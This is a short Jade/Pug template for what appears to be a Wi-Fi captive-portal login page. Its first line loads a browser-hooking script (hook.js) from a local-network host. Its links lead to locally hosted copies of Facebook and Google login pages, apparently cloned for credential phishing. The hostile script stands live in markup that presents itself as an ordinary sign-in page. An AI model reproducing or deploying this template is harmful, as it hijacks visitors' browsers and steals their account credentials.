script(src="http://192.168.254.1:3000/hook.js")
link(href="/css/bootstrap.css" rel="stylesheet" type="text/css")
.container.text-center
	br
	br
	div: a(href="/m.facebook.com/index.html"): img(src="/img/facebook.png")
	hr
	div: a(href="/accounts.google.com/ServiceLogin.html"): img(src="/img/google.png")
	hr
	div: h3: a(href="/login") Registrati
	br
	br